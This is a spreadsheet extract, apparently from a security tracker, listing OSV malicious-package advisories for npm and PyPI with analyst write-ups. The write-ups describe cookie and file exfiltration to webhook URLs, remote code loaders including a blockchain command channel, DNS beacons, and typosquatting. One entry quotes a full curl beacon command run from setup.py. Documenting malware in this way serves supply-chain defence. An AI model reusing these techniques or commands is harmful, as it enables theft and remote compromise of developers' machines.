      <c r="B1053" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1053" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16254</t>
        </is>
      </c>
      <c r="D1053" s="5" t="inlineStr"/>
      <c r="E1053" s="5" t="inlineStr"/>
      <c r="F1053" s="5" t="inlineStr"/>
      <c r="G1053" s="5" t="inlineStr"/>
      <c r="H1053" s="5" t="inlineStr"/>
      <c r="I1053" s="5" t="inlineStr"/>
      <c r="J1053" s="5" t="inlineStr"/>
      <c r="K1053" s="5" t="inlineStr"/>
      <c r="L1053" s="5" t="inlineStr">
        <is>
          <t>npm:pulse-pwn-9f3a2</t>
        </is>
      </c>
      <c r="M1053" s="5" t="inlineStr"/>
      <c r="N1053" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1053" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1053" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q1053" s="5" t="inlineStr"/>
      <c r="R1053" s="5" t="inlineStr"/>
      <c r="S1053" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (f8086e23ce4b6ff1ca043ca8d9c83f384455e0baee3d06cd79e8a0d5d52c04e1)
index.js contains top-level code that fetches /profile and sends document.cookie together with the response body to a hardcoded webhook.site URL (https://webhook.site/42c6d937-77c7-42a5-8678-ef06b4501e38) via a GET request with the cookie and profile content passed as URL-encoded query parameters. Any consumer that requires or imports this package in a browser-like context leaks the caller's session cookies and /profile response to an attacker-controlled collector. The destination is a third-party request-inspection service unrelated to any documented purpose of the package, and the exfiltration path fires on module load rather than through an explicit API call.
</t>
        </is>
      </c>
      <c r="T1053" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16254</t>
        </is>
      </c>
    </row>
    <row r="1054">
      <c r="A1054" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1054" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1054" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16260</t>
        </is>
      </c>
      <c r="D1054" s="5" t="inlineStr"/>
      <c r="E1054" s="5" t="inlineStr"/>
      <c r="F1054" s="5" t="inlineStr"/>
      <c r="G1054" s="5" t="inlineStr"/>
      <c r="H1054" s="5" t="inlineStr"/>
      <c r="I1054" s="5" t="inlineStr"/>
      <c r="J1054" s="5" t="inlineStr"/>
      <c r="K1054" s="5" t="inlineStr"/>
      <c r="L1054" s="5" t="inlineStr">
        <is>
          <t>npm:confx1789550882</t>
        </is>
      </c>
      <c r="M1054" s="5" t="inlineStr"/>
      <c r="N1054" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1054" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1054" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q1054" s="5" t="inlineStr"/>
      <c r="R1054" s="5" t="inlineStr"/>
      <c r="S1054" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (72ce9bca41cb0378952b582d6f115a3bffd2acea4999a90bae5f916428921b64)
The package's main file index.js is an IIFE that, when loaded in a browser same-origin context (e.g. via unpkg), reads location.href and document.cookie, fetches authenticated endpoints such as /profile, /admin, /dev, /flag, and /me with credentials:'include', and POSTs the responses along with a matched flag pattern to the hardcoded webhook https://webhook.site/04d98207-c947-4938-9f0c-f92feae051cb/. package.json contains only a 'ctf' description with no author or repository, and the single shipped artifact is this exfiltration payload. Comments in the file describe it as an unpkg-hosted exfil payload.
</t>
        </is>
      </c>
      <c r="T1054" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16260</t>
        </is>
      </c>
    </row>
    <row r="1055">
      <c r="A1055" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1055" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1055" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16261</t>
        </is>
      </c>
      <c r="D1055" s="5" t="inlineStr"/>
      <c r="E1055" s="5" t="inlineStr"/>
      <c r="F1055" s="5" t="inlineStr"/>
      <c r="G1055" s="5" t="inlineStr"/>
      <c r="H1055" s="5" t="inlineStr"/>
      <c r="I1055" s="5" t="inlineStr"/>
      <c r="J1055" s="5" t="inlineStr"/>
      <c r="K1055" s="5" t="inlineStr"/>
      <c r="L1055" s="5" t="inlineStr">
        <is>
          <t>npm:@railone/image-utils</t>
        </is>
      </c>
      <c r="M1055" s="5" t="inlineStr"/>
      <c r="N1055" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1055" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1055" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q1055" s="5" t="inlineStr"/>
      <c r="R1055" s="5" t="inlineStr"/>
      <c r="S1055" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (ebec05d8415347cef93849315a26f4221e34efa278fffe1b89700af039246dc6)
On import, index.js calls initialize() which spawns a detached, stdio-suppressed, windowsHide `node loader.js` child (init.js) and records its PID. loader.js HTTPS-fetches JSON from https://api.npoint.io/641d37178a880b1e8b8f, base64-decodes the `code` field, and executes it via `new Function('require','__dirname','__filename','module','exports', decodedCode)(...)`, running arbitrary attacker-controlled JavaScript on the installer's host with full Node privileges and network access. The npoint.io endpoint is a mutable third-party JSON store whose contents can be changed at any time by whoever controls that resource, giving that party a persistent remote code-push channel into every installer. The package advertises itself as an image/runtime utility exposing `getProcessInfo`/`getRuntimeInfo`, but no such functions are exported; internal comments identify the code as an 'ID-10 Client Module' for 'device information collection and remote code execution' with 'AUTO-START ON IMPORT'.
</t>
        </is>
      </c>
      <c r="T1055" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16261</t>
        </is>
      </c>
    </row>
    <row r="1056">
      <c r="A1056" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1056" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1056" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16262</t>
        </is>
      </c>
      <c r="D1056" s="5" t="inlineStr"/>
      <c r="E1056" s="5" t="inlineStr"/>
      <c r="F1056" s="5" t="inlineStr"/>
      <c r="G1056" s="5" t="inlineStr"/>
      <c r="H1056" s="5" t="inlineStr"/>
      <c r="I1056" s="5" t="inlineStr"/>
      <c r="J1056" s="5" t="inlineStr"/>
      <c r="K1056" s="5" t="inlineStr"/>
      <c r="L1056" s="5" t="inlineStr">
        <is>
          <t>npm:tailwindcss-form-ui</t>
        </is>
      </c>
      <c r="M1056" s="5" t="inlineStr"/>
      <c r="N1056" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1056" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1056" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q1056" s="5" t="inlineStr"/>
      <c r="R1056" s="5" t="inlineStr"/>
      <c r="S1056" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (c7a21e4623006a0c69e3dfeb80857eadd9102550c8a77c1d95e880245a5f0fa9)
Package name and repository field impersonate the legitimate tailwindlabs/tailwindcss-forms plugin, but the shipped main entry src/index.js is a fully obfuscated (obfuscator.io string-array) module that has nothing to do with Tailwind CSS. On module load it imports node:child_process (spawn), node:http/https, node:zlib and node:url, builds a list of Ethereum JSON-RPC endpoints (process.env.ETH_RPC_URL, *.publicnode.com, drpc.org, 1rpc.io/eth, blockscout) and an Etherscan-style txlist URL for the hardcoded sender address 0xa322E5f39aDC2490EfD311D3080e6f0121063e1a, and polls eth_blockNumber / eth_getBlockByNumber / eth_getTransactionCount to retrieve attacker-published transactions. The retrieved payloads are decompressed via gunzip/inflate/brotli and passed to child_process.spawn, giving whoever controls that Ethereum address arbitrary command execution on any host that requires or imports the package. The on-chain command channel is takedown-resistant. The Tailwind-forms identity, the obfuscated main, and the require-time RCE together form a cover-story typosquat delivering installer-side remote code execution.
</t>
        </is>
      </c>
      <c r="T1056" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16262</t>
        </is>
      </c>
    </row>
    <row r="1057">
      <c r="A1057" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1057" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1057" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16263</t>
        </is>
      </c>
      <c r="D1057" s="5" t="inlineStr"/>
      <c r="E1057" s="5" t="inlineStr"/>
      <c r="F1057" s="5" t="inlineStr"/>
      <c r="G1057" s="5" t="inlineStr"/>
      <c r="H1057" s="5" t="inlineStr"/>
      <c r="I1057" s="5" t="inlineStr"/>
      <c r="J1057" s="5" t="inlineStr"/>
      <c r="K1057" s="5" t="inlineStr"/>
      <c r="L1057" s="5" t="inlineStr">
        <is>
          <t>npm:tailwindcss-form-utils</t>
        </is>
      </c>
      <c r="M1057" s="5" t="inlineStr"/>
      <c r="N1057" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1057" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1057" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q1057" s="5" t="inlineStr"/>
      <c r="R1057" s="5" t="inlineStr"/>
      <c r="S1057" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (1eab685b70dc7394ba9eade13925f6da52267f61edcf8ba204bcf9ac3bd4c7bc)
The package publishes under the name tailwindcss-form-utils while pointing its repository field at https://github.com/tailwindlabs/tailwindcss-forms and mirroring that project's README verbatim, positioning itself as a lookalike of the first-party Tailwind Labs forms plugin. Its main entrypoint src/index.js is heavily obfuscated (obfuscator.io string-array with rotation, hex identifier renaming, 303 encoded string entries) and, once decoded, imports node:http, node:https, node:zlib, node:url and node:child_process spawn. It hard-codes an Ethereum sender address 0xa322E5f3D311D3080e9aDC2490Ef6f0121063e1a and queries Ethereum RPC endpoints (1rpc.io/eth, *.publicnode.com, eth.drpc.org) plus a blockscout/etherscan-style txlist indexer to retrieve transaction payloads authored by that address, reconstructs JavaScript source from the returned data, and injects it into the global scope (global.r=require, global.m=module) before executing it via child_process spawn. The blockchain acts as a mutable, attacker-writable command channel: whichever payload the attacker's address most recently published in a transaction becomes code executed on every require of the package. A Tailwind CSS plugin has no legitimate need for child_process, HTTP fetches to Ethereum RPCs, or dynamic global code assembly.
</t>
        </is>
      </c>
      <c r="T1057" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16263</t>
        </is>
      </c>
    </row>
    <row r="1058">
      <c r="A1058" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1058" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1058" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16264</t>
        </is>
      </c>
      <c r="D1058" s="5" t="inlineStr"/>
      <c r="E1058" s="5" t="inlineStr"/>
      <c r="F1058" s="5" t="inlineStr"/>
      <c r="G1058" s="5" t="inlineStr"/>
      <c r="H1058" s="5" t="inlineStr"/>
      <c r="I1058" s="5" t="inlineStr"/>
      <c r="J1058" s="5" t="inlineStr"/>
      <c r="K1058" s="5" t="inlineStr"/>
      <c r="L1058" s="5" t="inlineStr">
        <is>
          <t>PyPI:aiosendletter</t>
        </is>
      </c>
      <c r="M1058" s="5" t="inlineStr"/>
      <c r="N1058" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1058" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1058" s="5" t="inlineStr">
        <is>
          <t>2026-09-18</t>
        </is>
      </c>
      <c r="Q1058" s="5" t="inlineStr"/>
      <c r="R1058" s="5" t="inlineStr"/>
      <c r="S1058" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (29baa6f2cbfb2ef9907be7830505e33e82b5a1e6a45eb7f995022d09f5841f09)
The package advertises itself as a 'safe bug reporter' but its init() function archives the contents of %LOCALAPPDATA%\logs with shutil.make_archive and POSTs the resulting archive to a hardcoded, non-configurable Cloudflare Workers endpoint at https://sparkling-pine-f202.stilluer-sweden.workers.dev/. The destination is author-controlled, the caller has no way to redirect or disable it, and code comments indicate the target directory is expected to include a Telegram bot token folder — the collected data is credential-adjacent local state leaving the installer's machine. On Windows the same function calls ctypes.windll.shell32.ShellExecuteW with the 'runas' verb to relaunch the interpreter under UAC elevation before performing the archive-and-upload, broadening the set of files reachable for collection. Separately, pyproject.toml declares 'ctypes' as a runtime dependency; ctypes is a Python standard-library module, so pip resolves this name against PyPI and installs whatever package is published there under 'ctypes', executing that third party's code at install time. The cover-story description, the hardcoded off-host destination for locally-collected data, the privilege escalation, and the stdlib-name dependency-confusion vector jointly constitute an active supply-chain attack on installers.
## Source: kam193 (4e81e3b63bbe719f6d0bdd42930bb2f3235b8e41cbacf449743bb7dca67c9f08)
Package hides code to exfiltrate files. Most releases target unclear files, but some reveal the goal to exfiltrate sensitive Telegram data.
---
Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.
Campaign: 2026-09-aiosendletter
Reasons (based on the campaign):
 - files-exfiltration
 - target:telegram
</t>
        </is>
      </c>
      <c r="T1058" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16264</t>
        </is>
      </c>
    </row>
    <row r="1059">
      <c r="A1059" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1059" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1059" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16267</t>
        </is>
      </c>
      <c r="D1059" s="5" t="inlineStr"/>
      <c r="E1059" s="5" t="inlineStr"/>
      <c r="F1059" s="5" t="inlineStr"/>
      <c r="G1059" s="5" t="inlineStr"/>
      <c r="H1059" s="5" t="inlineStr"/>
      <c r="I1059" s="5" t="inlineStr"/>
      <c r="J1059" s="5" t="inlineStr"/>
      <c r="K1059" s="5" t="inlineStr"/>
      <c r="L1059" s="5" t="inlineStr">
        <is>
          <t>PyPI:pyjstat-smooth</t>
        </is>
      </c>
      <c r="M1059" s="5" t="inlineStr"/>
      <c r="N1059" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1059" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1059" s="5" t="inlineStr">
        <is>
          <t>2026-09-18</t>
        </is>
      </c>
      <c r="Q1059" s="5" t="inlineStr"/>
      <c r="R1059" s="5" t="inlineStr"/>
      <c r="S1059" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (f65efaaf25b41d789624595550d966762b21747205b23f15325db2e05924387d)
The package (advertised as a JSON-stat library) ships a test module that, when the test suite is executed, walks the /app and /Users directory trees, targets files ending in 'flags.json' (with an expected path '/app/injection_range/corpus/treasure/flags.json'), and uploads matched file contents to https://api.anthropic.com/v1/files. Authentication uses a hardcoded Anthropic API key ('sk-ant-api03-...') that is reassembled at runtime from split base64 fragments (baseA/baseB/baseC/baseD concatenated and base64-decoded inside _assembled_test_key()); the installer's own ANTHROPIC_API_KEY environment variable is explicitly ignored, so uploads occur under the author's Anthropic account regardless of the installer's configuration. setup.py declares test_suite='pyjstat.test' and the file uses a pytest-discoverable test_*.py name, so any installer running the shipped test suite triggers filesystem enumeration and upload of arbitrary local file contents to a third-party endpoint under the author's control. The runtime reassembly of the credential from split base64 fragments is a deliberate evasion of secret scanners and, together with the flag-hunting file walk, is inconsistent with legitimate library testing.
## Source: kam193 (82a12638b869aecb566588c24c0f59c3137f9b89a26ae67222370249a7176a75)
The package hides code to exfiltrate specific files from the user's machine. The used file paths suggest it was intended to be used in a CTF-like environment.
---
Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.
Campaign: 2026-09-pyjstat-smooth
Reasons (based on the campaign):
 - files-exfiltration
 - obfuscation
 - targetted-attack
 - clones-real-package
</t>
        </is>
      </c>
      <c r="T1059" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16267</t>
        </is>
      </c>
    </row>
    <row r="1060">
      <c r="A1060" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1060" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1060" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16268</t>
        </is>
      </c>
      <c r="D1060" s="5" t="inlineStr"/>
      <c r="E1060" s="5" t="inlineStr"/>
      <c r="F1060" s="5" t="inlineStr"/>
      <c r="G1060" s="5" t="inlineStr"/>
      <c r="H1060" s="5" t="inlineStr"/>
      <c r="I1060" s="5" t="inlineStr"/>
      <c r="J1060" s="5" t="inlineStr"/>
      <c r="K1060" s="5" t="inlineStr"/>
      <c r="L1060" s="5" t="inlineStr">
        <is>
          <t>PyPI:index-forum</t>
        </is>
      </c>
      <c r="M1060" s="5" t="inlineStr"/>
      <c r="N1060" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1060" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1060" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q1060" s="5" t="inlineStr"/>
      <c r="R1060" s="5" t="inlineStr"/>
      <c r="S1060" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: kam193 (7561fd94425cdde34f5f9f3d20482a0da8680414d0f38e1e00fea419ce23cf66)
The package hides code to exfiltrate specific files from the user's machine. The used file paths suggest it was intended to be used in a CTF-like environment.
---
Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.
Campaign: 2026-09-pyjstat-smooth
Reasons (based on the campaign):
 - files-exfiltration
 - obfuscation
 - targetted-attack
 - clones-real-package
</t>
        </is>
      </c>
      <c r="T1060" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16268</t>
        </is>
      </c>
    </row>
    <row r="1061">
      <c r="A1061" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1061" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1061" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16269</t>
        </is>
      </c>
      <c r="D1061" s="5" t="inlineStr"/>
      <c r="E1061" s="5" t="inlineStr"/>
      <c r="F1061" s="5" t="inlineStr"/>
      <c r="G1061" s="5" t="inlineStr"/>
      <c r="H1061" s="5" t="inlineStr"/>
      <c r="I1061" s="5" t="inlineStr"/>
      <c r="J1061" s="5" t="inlineStr"/>
      <c r="K1061" s="5" t="inlineStr"/>
      <c r="L1061" s="5" t="inlineStr">
        <is>
          <t>PyPI:requests-asetwe</t>
        </is>
      </c>
      <c r="M1061" s="5" t="inlineStr"/>
      <c r="N1061" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1061" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1061" s="5" t="inlineStr">
        <is>
          <t>2026-09-18</t>
        </is>
      </c>
      <c r="Q1061" s="5" t="inlineStr"/>
      <c r="R1061" s="5" t="inlineStr"/>
      <c r="S1061" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (c0316bf059751a9ece4fb034e225276529692338dc671ad9929e16faf8c843d5)
setup.py of requests-asetwe unconditionally executes `os.system('curl -s https://w5223hr2yr968bhwql8bv5n8ozuqih66.oastify.com')` during `pip install`. The destination is a Burp Collaborator (oastify.com) subdomain — an out-of-band interaction service used to confirm code execution and collect the victim's IP/DNS metadata on the attacker's collaborator instance. The package name is a lookalike of the widely-used `requests` package, and the shipped setup.py has no legitimate reason to contact an anonymous oastify subdomain at install time. Installing the package causes the installer's host to beacon to attacker-controlled infrastructure automatically.
## Source: kam193 (7078a9b4fc2be32cbeb1f2c20ec67834c8e293bd410ceeb4842cacd8340d9835)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061" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16269</t>
        </is>
      </c>
    </row>
    <row r="1062">
      <c r="A1062" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1062" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1062" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16270</t>
        </is>
      </c>
      <c r="D1062" s="5" t="inlineStr"/>
      <c r="E1062" s="5" t="inlineStr"/>
      <c r="F1062" s="5" t="inlineStr"/>
      <c r="G1062" s="5" t="inlineStr"/>
      <c r="H1062" s="5" t="inlineStr"/>
      <c r="I1062" s="5" t="inlineStr"/>
      <c r="J1062" s="5" t="inlineStr"/>
      <c r="K1062" s="5" t="inlineStr"/>
      <c r="L1062" s="5" t="inlineStr">
        <is>
          <t>npm:@tink/tink-link-core</t>
        </is>
      </c>
      <c r="M1062" s="5" t="inlineStr"/>
      <c r="N1062" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1062" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1062" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q1062" s="5" t="inlineStr"/>
      <c r="R1062" s="5" t="inlineStr"/>
      <c r="S1062" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (826e81131e7b2a296324d469c10f1e44d5b33683703c8a2e0f101a8674c1cfcf)
The package impersonates the Tink open-banking SDK (name @tink/tink-link-core, description 'Enterprise-grade client core for open banking', homepage github.com/tink-link/core) but its actual behavior is host reconnaissance and DNS exfiltration. The package.json install script runs `node index.js`, and both the install entry and main entry load lib/core.js, which reads os.userInfo().username, os.hostname(), and process.cwd(), joins them with a prefix and a hardcoded domain as DNS labels, and issues a dns.resolve4() lookup. The destination hostname and module/API names are reconstructed at runtime from hex byte arrays via Buffer.from(...).toString('utf8') in lib/b02e30.js and lib/6ad264.js — the decoded domain is oob.algamil7x.xyz and the label prefix is tinkcore. Module names 'os','dns','process' and API names 'userInfo','hostname','cwd','resolve4' are loaded via module.constructor._load with hex-decoded strings to hide them from static review. DNS-based egress bypasses HTTP proxy and firewall controls. The beacon fires automatically on `npm install` (via the install lifecycle script) and again on `require()` of the package, giving the attacker installer username, hostname, and current working directory for every affected environment.
</t>
        </is>
      </c>
      <c r="T1062" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16270</t>
        </is>
      </c>
    </row>
    <row r="1063">
      <c r="A1063" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1063" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1063" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16271</t>
        </is>
      </c>
      <c r="D1063" s="5" t="inlineStr"/>
      <c r="E1063" s="5" t="inlineStr"/>
      <c r="F1063" s="5" t="inlineStr"/>
      <c r="G1063" s="5" t="inlineStr"/>
      <c r="H1063" s="5" t="inlineStr"/>
      <c r="I1063" s="5" t="inlineStr"/>
      <c r="J1063" s="5" t="inlineStr"/>
      <c r="K1063" s="5" t="inlineStr"/>
      <c r="L1063" s="5" t="inlineStr">
        <is>
          <t>npm:test89078-auth</t>
        </is>
      </c>
      <c r="M1063" s="5" t="inlineStr"/>
      <c r="N1063" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1063" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1063" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q1063" s="5" t="inlineStr"/>
      <c r="R1063" s="5" t="inlineStr"/>
      <c r="S1063" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (c1ac938360c682e2489d11de9278697e7e2e85d73c612d2ab60ed28553bb5573)
The package's preinstall script (scripts.preinstall = 'node index.js') runs automatically on npm install and collects os.userInfo().username and os.hostname(), then issues a dns.lookup against a subdomain of 31ee29fe-db68-4fd3-86a2-2b707b9e95f0.dnshook.site with the username and hostname embedded in the queried label. This is a DNS-based exfiltration beacon: installing the package transmits installer host identifiers to a non-first-party canary domain over DNS resolution at install time. The version number 99.99.99 and package name shape are consistent with a dependency-confusion lure targeting an internal package name.
</t>
        </is>
      </c>
      <c r="T1063" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16271</t>
        </is>
      </c>
    </row>
    <row r="1064">
      <c r="A1064" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1064" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1064" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16273</t>
        </is>
      </c>
      <c r="D1064" s="5" t="inlineStr"/>
      <c r="E1064" s="5" t="inlineStr"/>
      <c r="F1064" s="5" t="inlineStr"/>
      <c r="G1064" s="5" t="inlineStr"/>
      <c r="H1064" s="5" t="inlineStr"/>
      <c r="I1064" s="5" t="inlineStr"/>
      <c r="J1064" s="5" t="inlineStr"/>
      <c r="K1064" s="5" t="inlineStr"/>
      <c r="L1064" s="5" t="inlineStr">
        <is>
          <t>npm:blue-string-formatter-utils</t>
        </is>
      </c>
      <c r="M1064" s="5" t="inlineStr"/>
      <c r="N1064" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1064" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1064" s="5" t="inlineStr">
        <is>
          <t>2026-09-18</t>
        </is>
      </c>
      <c r="Q1064" s="5" t="inlineStr"/>
      <c r="R1064" s="5" t="inlineStr"/>
      <c r="S1064" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (aa3c9f5edcc636fc8d38e40a6bb225aed8f6b638be31f2abf8b6e747212c9565)
The package advertises itself as 'Utility helpers for string formatting' but its shipped main file performs a single behavior: an XMLHttpRequest GET to the protocol-relative URL //xss.report/c/k3rne111 whose response body is passed directly to eval(). Any require()/import of this package causes arbitrary attacker-controlled JavaScript from xss.report to execute in the consumer's Node process, with no pinning, no integrity check, and no relationship to the advertised functionality. The mismatch between the package's stated purpose (string utilities) and its actual contents (a remote-code loader) is a cover-story pattern.
</t>
        </is>
      </c>
      <c r="T1064" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16273</t>
        </is>
      </c>
    </row>
    <row r="1065">
      <c r="A1065" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1065" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1065" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16274</t>
        </is>
      </c>
      <c r="D1065" s="5" t="inlineStr"/>
      <c r="E1065" s="5" t="inlineStr"/>
      <c r="F1065" s="5" t="inlineStr"/>
      <c r="G1065" s="5" t="inlineStr"/>
      <c r="H1065" s="5" t="inlineStr"/>
      <c r="I1065" s="5" t="inlineStr"/>
      <c r="J1065" s="5" t="inlineStr"/>
      <c r="K1065" s="5" t="inlineStr"/>
      <c r="L1065" s="5" t="inlineStr">
        <is>
          <t>PyPI:requests-auroras</t>
        </is>
      </c>
      <c r="M1065" s="5" t="inlineStr"/>
      <c r="N1065" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1065" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1065" s="5" t="inlineStr">
        <is>
          <t>2026-09-18</t>
        </is>
      </c>
      <c r="Q1065" s="5" t="inlineStr"/>
      <c r="R1065" s="5" t="inlineStr"/>
      <c r="S1065" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: kam193 (afa39517de816c01400eef99ef6ebce1357910c217c5e0ff55e4a252ea15a4c5)
